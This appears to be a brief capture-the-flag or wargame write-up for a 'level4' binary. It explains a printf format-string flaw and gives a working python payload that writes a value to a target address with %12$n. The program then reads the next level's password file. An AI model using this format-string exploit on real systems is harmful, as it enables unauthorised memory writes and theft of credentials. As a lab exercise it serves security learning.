level4 binary with the rights of level5

a printf call again, another comparison to an unset variable

we can modify the 12th register using the same method
address is 0x8049810. nb to compare is 0x1025544 (= 16930116)

we can try to
python 'print("\x10\x98\x04\x08' + "a" * 16930112 + "%12$n")'

doesn't work because it makes too big of a string

we can overcome this using printf's print_size like this:
python -c 'print("\x10\x98\x04\x08" + "%016930112d" + "%12$n")' | ./level4

it works

this time the syscall is just 'cat /home/user/level5/.pass', we don't need cat.
